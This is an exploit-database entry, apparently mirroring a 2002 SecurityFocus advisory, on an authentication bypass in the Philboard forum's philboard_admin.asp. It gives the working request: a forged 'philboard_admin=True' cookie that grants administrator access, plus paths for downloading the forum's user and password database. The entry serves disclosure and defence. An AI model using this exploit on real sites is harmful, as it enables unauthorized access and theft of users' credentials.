header-logo
Suggest Exploit
vendor:
Philboard
by:
SecurityFocus
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Philboard
Affected Version From: 1.14
Affected Version To: 1.14
Patch Exists: NO
Related CWE: N/A
CPE: philboard
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

Authentication Bypass in Philboard

A vulnerability has been discovered in the 'philboard_admin.asp' script used by Philboard. The problem occurs during authentication and may allow an attacker to gain unauthorized administrative access. The issue presents itself when handling cookie-based authentication credentials. By gaining administrative access an attacker may be capable of carrying out a variety of attacks. It should be noted that although this vulnerability has been reported to affect philboard version 1.14 previous versions might also be affected. Use telnet and open target on port 80 GET /board/philboard_admin.asp HTTP/1.0 Host: example.com Cookie: philboard_admin=True; Download the database (users and password): Usually, the database location can be found and download it from: http://www.target.com/database/philboard.mdb or http://www.target.com/forum/database/philboard.mdb

Mitigation:

Ensure that authentication credentials are handled securely and that access to the philboard_admin.asp script is restricted to authorized personnel.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7739/info

A vulnerability has been discovered in the 'philboard_admin.asp' script used by Philboard. The problem occurs during authentication and may allow an attacker to gain unauthorized administrative access.

The issue presents itself when handling cookie-based authentication credentials.

By gaining administrative access an attacker may be capable of carrying out a variety of attacks.

It should be noted that although this vulnerability has been reported to affect philboard version 1.14 previous versions might also be affected. 

Use telnet and open target on port 80

GET /board/philboard_admin.asp HTTP/1.0
Host: example.com
Cookie: philboard_admin=True;

Download the database (users and password):

Usually, the database location can be found and download it from:
http://www.target.com/database/philboard.mdb
or
http://www.target.com/forum/database/philboard.mdb